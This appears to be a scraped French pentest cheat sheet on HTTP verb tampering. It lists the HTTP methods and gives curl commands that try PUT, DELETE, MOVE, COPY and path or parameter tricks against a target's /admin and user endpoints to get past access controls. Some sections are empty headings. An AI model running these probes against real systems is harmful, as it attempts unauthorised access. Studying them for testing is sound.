HTTP Verbe Tampering
Méthodes HTTP Courantes
GET # Récupération de ressources
POST # Envoi de données au serveur
PUT # Modification/ajout de ressources
DELETE # Suppression de ressources
PATCH # Modification partielle de ressources
OPTIONS # Demande des méthodes supportées
HEAD # Récupération des en-têtes seulement
TRACE # DebuggingContournement des Restrictions d'Accès
# Tester des verbes alternatifs
curl -X PUT http://target.com/admin
curl -X DELETE http://target.com/user/1
# Ajouter des suffixes ou des paramètres
curl -X GET http://target.com/admin/;
curl -X GET http://target.com/admin?method=DELETE
# Tester des variations non standards
curl -X MOVE http://target.com/admin
curl -X COPY http://target.com/adminBypass via Headers HTTP
Outils Utiles
Mis à jour